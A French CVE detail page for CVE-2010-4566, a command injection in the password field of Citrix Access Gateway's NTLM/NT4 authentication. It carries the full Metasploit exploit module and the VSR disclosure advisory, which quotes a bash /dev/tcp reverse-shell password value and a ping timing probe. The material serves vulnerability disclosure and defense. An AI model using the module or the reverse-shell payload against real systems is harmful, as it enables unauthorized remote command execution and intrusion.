CVE-2010-4566 : Détail

CVE-2010-4566

14.26%V3
Network
2011-01-14
21h00 +00:00
2011-01-21
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16916

Date de publication : 2011-03-02 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix Access Gateway Command Execution', 'Description' => %q{ The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. }, 'Author' => [ 'George D. Gal', # Original advisory 'Erwin Paternotte', # Exploit module ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11873 $', 'References' => [ [ 'CVE', '2010-4566' ], [ 'OSVDB', '70099' ], [ 'BID', '45402' ], [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ] ], 'Privileged' => false, 'Payload' => { 'Space' => 127, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic telnet bash-tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Dec 21 2010', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [ true, 'Use SSL', true ]), ], self.class) end def post(command, background) username = rand_text_alphanumeric(20) if background sploit = Rex::Text.uri_encode('|' + command + '&') else sploit = Rex::Text.uri_encode('|' + command) end data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username=" data << username data << "&password=" data << sploit res = send_request_cgi({ 'uri' => '/', 'method' => 'POST', 'data' => data }, 25) end def check print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now post("ping -c 10 127.0.0.1", false) elapsed = Time.now - start if elapsed >= 3 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit cmd = payload.encoded if not post(cmd, true) raise RuntimeError, "Unable to execute the desired command" end end end
Exploit Database EDB-ID : 15806

Date de publication : 2010-12-21 23h00 +00:00
Auteur : George D. Gal
EDB Vérifié : Yes

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Citrix Access Gateway Command Injection Vulnerability Release Date: 2010-12-21 Application: Citrix Access Gateway Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) Access Gateway Standard & Advanced Edition (prior to 5.0) Severity: High Author: George D. Gal <ggal (at) vsecurity (dot) com> Vendor Status: Updated Software Released, NT4 Authentication Removed [2] CVE Candidate: CVE-2010-4566 Reference: http://www.vsecurity.com/resources/advisory/20101221-1/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - ------------------- - From [1]: "Citrix(R) Access Gateway(TM) is a secure application access solution that provides administrators granular application-level control while empowering users with remote access from anywhere. It gives IT administrators a single point to manage access control and limit actions within sessions based on both user identity and the endpoint device, providing better application security, data protection, and compliance management." Vulnerability Overview - ---------------------- On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within the way user authentication credentials are handled. Under certain configuration settings it appears that user credentials are passed as arguments to a command line program to authenticate the user. A lack of data validation and the mechanism in which the external program is spawned results in the potential for command injection and arbitrary command execution on the Access Gateway. Vulnerability Details - --------------------- The Citrix Access Gateway provides support for multiple authentication types. When utilizing the external legacy NTLM authentication module known as ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command line utility to verify a user's identity and password. By embedding shell metacharacters in the web authentication form it is possible to execute arbitrary commands on the Access Gateway. The following commands are executed by the ntlm_authenticator during this process: vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx By submitting a password value as shown below, it is possible to establish a reverse shell to a netcat listener: | bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 & Using a simple ping command in the password field an attacker could use timing attacks to verify the presence of the vulnerability: | ping -c 10 <<HOST>> The ping command above will attempt to send 10 ICMP echo requests to the target host, resulting in a noticable delay easily detected by vulnerability scanners. Versions Affected - ----------------- Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. According to the vendor this vulnerability affects all versions of Access Gateway Enterprise Edition up to version 9.2-49.8, and all versions of the Access Gateway Standard and Advanced Editions prior to Access Gateway 5.0. Vendor Response - --------------- The following timeline details the vendor's response to the reported issue: 2010-08-06 Citrix was provided a draft advisory. 2010-08-10 Citrix acknowledged receipt of draft advisory. 2010-08-16 VSR follow-up to determine confirmation of issue. 2010-08-16 Citrix confirmed issue. 2010-09-14 VSR follow-up to determine status of issue. 2010-09-29 VSR follow-up to determine status of issue. 2010-09-30 Citrix confirmed continued investigation of the issue. 2010-10-19 VSR follow-up to determine status of issue. 2010-10-26 Citrix verified issue only exists in NT4 authentication feature. 2010-12-01 VSR follow-up to determine status of issue. 2010-12-02 Citrix confirmed December 14th release of security bulletin. 2010-12-14 Citrix releases security bulletin. 2010-12-20 CVE assigned 2010-12-21 VSR releases advisory. The Citrix advisory may be obtained at: http://support.citrix.com/article/CTX127613 Recommendation - -------------- Citrix has indicated that this vulnerability only affects legacy NT4 authentication which has been removed from the latest release of the device firmware. Common Vulnerabilities and Exposures (CVE) Information - ------------------------------------------------------ The Common Vulnerabilities and Exposures (CVE) project has assigned the number CVE-2010-4566 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Acknowledgements - ---------------- VSR would like to thank Citrix for the coordinated release of this advisory. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. Citrix Access Gateway http://citrix.com/accessgateway/overview 2. Citrix Access Gateway - Vendor Security Bulletin http://support.citrix.com/article/CTX127613 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This advisory is distributed for educational purposes only with the sincere hope that it will help promote public safety. This advisory comes with absolutely NO WARRANTY; not even the implied warranty of merchantability or fitness for a particular purpose. Virtual Security Research, LLC nor the author accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. See the VSR disclosure policy for more information on our responsible disclosure practices: http://www.vsecurity.com/company/disclosure - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Copyright 2010 Virtual Security Research, LLC. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk0Q3L8ACgkQQ1RSUNR+T+idEwCeN2plOLk8rWQoPY4DqAolEY5V EbEAoJn38LPt3MEm3xvQaL6wWPbwDsUb =b3y+ -----END PGP SIGNATURE-----

Products Mentioned

Configuraton 0

Citrix>>Access_gateway >> Version To (including) 9.2-49.8

    Citrix>>Access_gateway >> Version .8.0

      Citrix>>Access_gateway >> Version 8.0

        Citrix>>Access_gateway >> Version 8.0

          Citrix>>Access_gateway >> Version 8.0

            Citrix>>Access_gateway >> Version 8.1-69.4

              Citrix>>Access_gateway >> Version 9.0.71.3

                Citrix>>Access_gateway >> Version 9.1-104.5

                  Configuraton 0

                  Citrix>>Access_gateway >> Version 4.5

                  Citrix>>Access_gateway >> Version 4.5

                    Citrix>>Access_gateway >> Version 4.5

                    Citrix>>Access_gateway >> Version 4.5

                    Citrix>>Access_gateway >> Version 4.5.5

                      Citrix>>Access_gateway >> Version 4.5.6

                        Citrix>>Access_gateway >> Version 4.5.7

                          Citrix>>Access_gateway >> Version 4.6.1

                            Citrix>>Access_gateway >> Version 4.6.2

                              Citrix>>Access_gateway >> Version 4.6.3

                                Références

                                http://www.securitytracker.com/id?1024893
                                Tags : vdb-entry, x_refsource_SECTRACK
                                http://securityreason.com/securityalert/8119
                                Tags : third-party-advisory, x_refsource_SREASON
                                http://www.osvdb.org/70099
                                Tags : vdb-entry, x_refsource_OSVDB
                                http://www.exploit-db.com/exploits/16916
                                Tags : exploit, x_refsource_EXPLOIT-DB